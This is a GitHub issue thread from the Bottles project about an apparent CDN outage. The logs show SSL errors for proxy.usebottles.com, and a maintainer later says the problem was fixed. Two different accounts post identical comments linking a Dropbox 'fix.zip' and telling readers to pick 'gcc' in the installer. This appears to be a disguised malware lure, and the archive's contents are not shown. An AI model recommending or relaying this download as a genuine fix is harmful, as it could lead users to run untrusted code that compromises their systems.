### ISSUE TITLE
CDN appears to be down

### ISSUE THREAD

**Issue by romatthe** [bottlesdevs/Bottles#3480]
Currently, Bottles is not showing anything in its list of dependencies.

![image](https://github.com/user-attachments/assets/e4c11af5-9361-4cb1-b99d-475846158e05)

Apparently it's having issues contacting `proxy.usebottles.com`

```
02:08:20 (INFO) Bottles Started!
02:08:20 (ERROR) Could not get index for installers repository: (60, "SSL: no alternative certificate subject name matches target host name 'proxy.usebottles.com'")
02:08:20 (ERROR) Could not get index for installers repository
02:08:20 (ERROR) Could not get index for components repository: (60, "SSL: no alternative certificate subject name matches target host name 'proxy.usebottles.com'")
02:08:20 (ERROR) Could not get index for components repository
02:08:20 (ERROR) Could not get index for dependencies repository: (60, "SSL: no alternative certificate subject name matches target host name 'proxy.usebottles.com'")
02:08:20 (ERROR) Could not get index for dependencies repository
```

Which is sort of explained by the CDN clearly having some issues:

![image](https://github.com/user-attachments/assets/dc278336-c14d-425f-a653-fdc7577b1555)

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by samankittani** [comment]
proxy.usebottles.com is up for me

**Comment by scmp2010** [comment]
I have the same error
![Almost Done](https://github.com/user-attachments/assets/fc7f1d07-f645-46fa-8a2c-000cede9cdd2)

**Comment by mirkobrombin** [comment]
Fixed a while ago
